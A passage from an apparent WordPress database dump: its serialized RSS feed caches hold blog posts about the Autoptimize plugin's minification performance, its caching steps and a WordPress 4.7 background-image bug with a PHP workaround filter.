}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:27:"http://www.w3.org/2005/Atom";a:1:{s:4:"link";a:2:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:3:{s:3:"rel";s:4:"self";s:4:"type";s:19:"application/rss+xml";s:4:"href";s:46:"http://feeds.feedburner.com/futtta_autoptimize";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:2:{s:3:"rel";s:3:"hub";s:4:"href";s:32:"http://pubsubhubbub.appspot.com/";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:4:"info";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:1:{s:0:"";a:1:{s:3:"uri";s:18:"futtta_autoptimize";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:10:{s:12:"content-type";s:23:"text/xml; charset=UTF-8";s:4:"etag";s:27:"jVzfdtmmg3cs5CW6Q7SOk/PQp9Y";s:13:"last-modified";s:29:"Wed, 25 Jan 2017 12:12:52 GMT";s:16:"content-encoding";s:4:"gzip";s:4:"date";s:29:"Wed, 25 Jan 2017 14:07:35 GMT";s:7:"expires";s:29:"Wed, 25 Jan 2017 14:07:35 GMT";s:13:"cache-control";s:18:"private, max-age=0";s:22:"x-content-type-options";s:7:"nosniff";s:16:"x-xss-protection";s:13:"1; mode=block";s:6:"server";s:3:"GSE";}}s:5:"build";s:14:"20130911040210";}', 'no'); 
INSERT INTO `wp_options` VALUES (607582, '_transient_timeout_feed_mod_760b3218a3724706ad0e8ff9b09019ce', '1485396455', 'no'); 
INSERT INTO `wp_options` VALUES (607583, '_transient_feed_mod_760b3218a3724706ad0e8ff9b09019ce', '1485353255', 'no'); 
INSERT INTO `wp_options` VALUES (607584, '_transient_timeout_feed_3dcbbcc036ac7e5be38f83a0bd0adcdd', '1485396456', 'no'); 
INSERT INTO `wp_options` VALUES (607585, '_transient_feed_3dcbbcc036ac7e5be38f83a0bd0adcdd', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:49:"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:39:"wordpress – Frank Goossens&#039; blog";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:21:"http://blog.futtta.be";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:30:"(futtta\'s Twitterless twaddle)";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:13:"lastBuildDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 18 Jan 2017 13:37:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:5:"en-US";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"generator";a:1:{i:0;a:5:{s:4:"data";s:30:"https://wordpress.org/?v=4.7.1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:10:{i:0;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:37:"How to make Autoptimize (even) faster";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/nw4MFxsm8Fc/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:78:"http://blog.futtta.be/2017/01/18/how-to-make-autoptimize-even-faster/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 18 Jan 2017 13:37:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:7:"support";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:15:"tips and tricks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10454";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:370:"Less blogposts here lately, mostly because I&#8217;m doing custom Autoptimize-development for a partner (more on that later) and because I get a lot of support-questions on the wordpress.org support forums (with approx. between 1500-2000 downloads/ weekday that is to be expected). One of the more interesting questions I got there was about Autoptimize being slow [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3125:"<p>Less blogposts here lately, mostly because I&#8217;m doing custom Autoptimize-development for a partner (more on that later) and because I get a lot of support-questions on the wordpress.org support forums (with approx. between 1500-2000 downloads/ weekday that is to be expected). One of the more interesting questions I got there was about <a href="https://wordpress.org/support/topic/longer-load-times-when-js-enabled/">Autoptimize being slow when JS optimization was active and what would be the cause of that</a>. The reply is of interest for a larger audience and is equally valid for CSS optimization;</p>\n<blockquote><p>Typically the majority of time spent in Autoptimize is mainly in the actual minification of code that is not minified yet (purely based on filename; if the filename ends in .min.js or -min.js).</p>\n<p>So generally speaking, the way to avoid this is;<br />\n1. have a <strong>page cache</strong> to avoid requests triggering autoptimize (as in that case the cached HTML will have links to cached CSS/JS in it)<br />\n2. for uncached pages; <strong>make sure AO can re-use previously cached CSS/ JS</strong> (from another page), in which case no minification needs to be done (for that you will almost always want to <strong>NOT aggregate inline JS</strong>, as this almost always busts the cache)<br />\n3. for uncached CSS/ JS; make sure any minified file is recognizable as such in <strong>the filename (e.g. .min.css -min.js)</strong>, this can lighten the minification-load considerably (I’ll add a filter in the next version of AO so you can tell AO a file is minified even if it does not have that in the name).</p>\n<p>So based on this, some tips;<br />\n* make sure you’re not aggregating inline JS<br />\n* for your own code (CSS/ JS); make sure it is minified and that the filename confirms this. if you can convince the theme’s developer to do so, all the better (esp. the already minified but big wp-content/themes/bridge/js/plugins.js is a waste of precious resources)<br />\n* you could try switching to the legacy minifiers (see <a href="https://wordpress.org/plugins/autoptimize/faq/">FAQ</a>) to see if this improves performance<br />\n* you can also check if excluding some un-minified files from minification helps performance (e.g. that bridge/js/plugins.js)</p></blockquote>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2016/04/14/reviewing-bad-reviews-when-in-a-bad-mood/" rel="bookmark" title="Reviewing bad reviews when in a bad mood">Reviewing bad reviews when in a bad mood </a></li>\n<li><a href="http://blog.futtta.be/2014/08/18/when-should-you-trycatch-javascript/" rel="bookmark" title="(When) should you Try/Catch Javascript?">(When) should you Try/Catch Javascript? </a></li>\n<li><a href="http://blog.futtta.be/2015/07/21/want-to-beta-test-autoptimize-power-ups/" rel="bookmark" title="Want to beta-test Autoptimize power-ups?">Want to beta-test Autoptimize power-ups? </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/nw4MFxsm8Fc" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:74:"http://blog.futtta.be/2017/01/18/how-to-make-autoptimize-even-faster/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:69:"http://blog.futtta.be/2017/01/18/how-to-make-autoptimize-even-faster/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:60:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:58:"WordPress 4.7 custom background image bug &amp; workaround";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/_HuuQwRh2Bo/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:95:"http://blog.futtta.be/2016/12/07/wordpress-4-7-custom-background-image-bug-workaround/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 07 Dec 2016 15:46:40 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:7:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:3:"bug";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:17:"custom background";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:13:"wordpress 4.7";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:10:"workaround";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10437";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:335:"If you encountered this bug but are not using Autoptimize, leave a comment below or contact me here. Your info can help understand if the regression has an impact outside of Autoptimize as well! Gotta love Sarah, but there&#8217;s a small bug in Vaughan&#8217;s (WordPress 4.7) that breaks (part of the CSS) when Autoptimized. If [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2909:"<p>If you encountered this bug but are <strong>not using Autoptimize</strong>, leave a comment below or <a href="/contact/">contact me here</a>. Your info can help understand if the regression has an impact outside of Autoptimize as well!</p>\n<hr />\n<p>Gotta love Sarah, <a href="https://wordpress.org/support/topic/incompatibility-with-wp-4-7-aggregate-inline-css/">but there&#8217;s a small bug in Vaughan&#8217;s (WordPress 4.7) that breaks (part of the CSS) when Autoptimized</a>. If you have a theme that supports custom backgrounds (e.g. TwentySixteen) and you set that custom background in the Customizer, the URL ends up escaped (well, they wp_json_encode() it actually) like this;</p>\n<pre class="brush: css; title: ; notranslate">\nbody{background-image: url(&quot;http:\\/\\/localhost\\/wordpress\\/wp-content\\/uploads\\/layerslider\\/Full-width-demo-slider\\/left.png&quot;);}\n</pre>\n<p>Which results in the Autoptimized CSS for the background-image being broken because the URL is not recognized as such. The <a href="https://core.trac.wordpress.org/ticket/39145#comment:1">bug has been confirmed already</a> and <a href="https://core.trac.wordpress.org/attachment/ticket/39145/39145.diff">the fix</a> should land in WordPress 4.7.1.</p>\n<p>If you&#8217;re impacted and can&#8217;t wait for 4.7.1 to be released, there are 2 workarounds:<br />\n1. simple: disable the &#8220;Aggregate inline CSS&#8221;-option<br />\n2. geeky: use this code snippet to fix the URL before AO has a change to misinterpret it;</p>\n<pre class="brush: php; title: ; notranslate">add_filter(\'autoptimize_filter_html_before_minify\',\'fix_encoded_urls\');\nfunction fix_encoded_urls($htmlIn) {\n	if ( strpos($htmlIn,&quot;body.custom-background&quot;) !== false ) {\n		preg_match_all(&quot;#background-image:\\s?url\\(?[\\&quot;|\']((http(s)?)?:\\\\\\/\\\\\\/.*)[\\&quot;|\']\\)?#&quot;,$htmlIn,$badUrls);\n	  	if ($badUrls) {\n			foreach ($badUrls[1] as $badUrl) {\n				$htmlIn = str_replace($badUrl, stripslashes($badUrl), $htmlIn);\n			}\n		}\n	}\n  	return $htmlIn;\n}</pre>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2012/12/20/2012-ffwd-high-performance-twenty-twelve-child-theme/" rel="bookmark" title="2012.FFWD; high performance Twenty Twelve child theme">2012.FFWD; high performance Twenty Twelve child theme </a></li>\n<li><a href="http://blog.futtta.be/2013/11/08/wp-default-themes-2010-2014-performance-going-down/" rel="bookmark" title="WP default themes 2010-2014: performance going down">WP default themes 2010-2014: performance going down </a></li>\n<li><a href="http://blog.futtta.be/2014/02/13/should-you-inline-or-defer-blocking-css/" rel="bookmark" title="Should you inline or defer blocking CSS?">Should you inline or defer blocking CSS? </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/_HuuQwRh2Bo" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:91:"http://blog.futtta.be/2016/12/07/wordpress-4-7-custom-background-image-bug-workaround/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"5";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:86:"http://blog.futtta.be/2016/12/07/wordpress-4-7-custom-background-image-bug-workaround/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:36:"So how does Autoptimize work anyway?";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/v3VLBgfa58A/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:78:"http://blog.futtta.be/2016/11/09/so-how-does-autoptimize-work-anyway/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 09 Nov 2016 17:48:49 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:21:"how autoptimize works";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10423";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:332:"A question that has come up a couple of times already is how Autoptimize and it&#8217;s cache work. So let&#8217;s do some copy/pasting of what I replied earlier on the wordpress.org support forum; AO intercepts the HTML created by WordPress for a request (using the output buffer) all references to JS (and CSS) are extracted [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2913:"<p>A question that has come up a couple of times already is how Autoptimize and it&#8217;s cache work. So let&#8217;s do some copy/pasting of what I <a href="https://wordpress.org/support/topic/what-is-considered-a-huge-cache/#post-8413510">replied earlier on the wordpress.org support forum</a>;</p>\n<ol>\n<li>AO <strong>intercepts the HTML</strong> created by WordPress for a request (using the output buffer)</li>\n<li>all <strong>references to JS (and CSS) are extracted</strong> from the HTML</li>\n<li>all original <strong>references</strong> to JS (and CSS) are <strong>removed</strong> from the HTML (the code in the original files is left as is, AO never changes those files)</li>\n<li>all JS (and CSS) is <strong>aggregated</strong> (JS in one string, CSS in as many strings as there were media types)</li>\n<li>the <strong>md5-hash</strong> (mathematical/ cryptographic function that generates a quasi-unique string based on another string) of the aggregated JS (and CSS) is calculated</li>\n<li>using the md5 AO <strong>checks if a cached file with that md5 exists</strong> and if so continues to step 8</li>\n<li>if <strong>no cached file</strong> is found, the JS (and CSS) is <strong>minified and cached in a new file</strong>, with the md5 as part of the filename</li>\n<li>the <strong>links</strong> to the autoptimized JS (and CSS) file in cache are <strong>injected in the HTML</strong></li>\n<li>the <strong>HTML is minified</strong> (but not cached in Autoptimize)</li>\n<li>the <strong>HTML is returned to WordPress</strong> (where it can be cached by a page cache and sent to the visitor)</li>\n</ol>\n<p>This is especially interesting if you want to understand why the cache size can &#8220;explode&#8221;; if in step 4 the code is even a bit different from previous requests, the md5-hash in step 5 will be different so the file will not be found in cache (step 6) and the code will be re-minified (which is relatively expensive) and cached (step 7).</p>\n<p>And that, my friends, is how Autoptimize works.</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2012/11/06/dipping-below-the-magical-1-second-page-load-time/" rel="bookmark" title="Dipping below the magical 1 second page load time">Dipping below the magical 1 second page load time </a></li>\n<li><a href="http://blog.futtta.be/2013/04/01/easter-bunny-special-autoptimize-1-6-0/" rel="bookmark" title="Easter Bunny special: Autoptimize 1.6.0">Easter Bunny special: Autoptimize 1.6.0 </a></li>\n<li><a href="http://blog.futtta.be/2015/12/09/bringing-autoptimize-2-0-beta-to-a-christmas-tree-near-you/" rel="bookmark" title="Bringing Autoptimize 2.0 (beta) to a Christmas-tree near you">Bringing Autoptimize 2.0 (beta) to a Christmas-tree near you </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/v3VLBgfa58A" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:74:"http://blog.futtta.be/2016/11/09/so-how-does-autoptimize-work-anyway/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"4";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:69:"http://blog.futtta.be/2016/11/09/so-how-does-autoptimize-work-anyway/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:54:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:45:"More than 200000 active Autoptimize installs!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/zirvZBKqhD4/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:82:"http://blog.futtta.be/2016/10/14/over-200000-active-autoptimize-installs/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 14 Oct 2016 07:45:43 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:5:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:15:"active installs";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:12:"plugin stats";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:4:"w00t";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10409";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:83:"Today Autoptimize officially passed the threshold of 200000 active installs. w00t!!";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:1523:"<p>Today <a href="https://wordpress.org/plugins/autoptimize/stats/">Autoptimize</a> officially passed the threshold of 200000 active installs. w00t!!</p>\n<p><a href="http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1.png"><img class="alignleft size-medium wp-image-10413" src="http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1-300x255.png" alt="ao_200k" width="300" height="255" srcset="http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1-300x255.png 300w, 